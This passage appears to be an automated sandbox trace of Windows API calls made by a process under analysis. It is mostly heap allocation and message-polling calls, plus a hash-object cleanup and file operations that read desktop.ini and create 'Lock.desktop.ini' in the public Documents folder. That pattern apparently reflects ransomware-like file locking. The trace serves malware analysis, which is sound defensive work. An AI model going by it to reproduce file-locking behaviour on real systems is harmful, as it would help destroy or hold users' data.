dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.080] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0267.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e50 | out: hHeap=0x25c0000) returned 1 [0267.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0267.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0267.081] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0267.081] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0267.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0267.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0267.081] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0267.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0267.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0267.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0267.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0267.082] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.082] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0267.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.082] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0267.082] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0267.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0267.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.083] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0267.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.083] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0267.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0267.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0267.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0267.083] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0267.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0267.084] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0267.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.084] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0267.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0267.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0267.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.084] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0267.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0267.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0267.084] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0267.085] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0267.085] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.085] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0267.085] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.085] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1798 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.085] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0267.085] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1798 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0267.086] CryptDestroyHash (hHash=0xaa5820) returned 1 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2de8 [0267.086] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0267.086] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0267.086] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.087] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0267.087] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.087] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2cc [0267.088] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0267.088] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf2c8 | out: lpNewFilePointer=0x0) returned 1 [0267.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e30 [0267.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.089] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0267.089] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.089] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0267.089] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.089] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0267.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0267.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9b8 [0267.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9b8 | out: hHeap=0x25c0000) returned 1 [0267.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0267.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0267.090] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x70) returned 0x240ca38 [0267.090] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0267.090] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents/" (normalized: "c:\\users\\public\\documents")) returned 0x11 [0267.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240ca38 | out: hHeap=0x25c0000) returned 1 [0267.091] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0267.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0267.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10000) returned 0x3561010 [0267.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0267.091] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0267.091] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/Lock.desktop.ini" (normalized: "c:\\users\\public\\documents\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0267.092] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466df0 [0267.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.092] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0267.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0267.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0267.093] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13d8 | out: hHeap=0x25c0000) returned 1 [0267.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0267.093] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0267.093] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0267.093] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0267.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13d8 [0267.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0267.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0267.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.093] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0267.093] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa670 [0267.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0267.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8f8 [0267.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1748 | out: hHeap=0x25c0000) returned 1 [0267.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0267.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0267.094] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0267.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1748 [0267.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0267.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0267.094] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0267.094] RtlAllocateHeap (HeapHandle=0x25c0000, 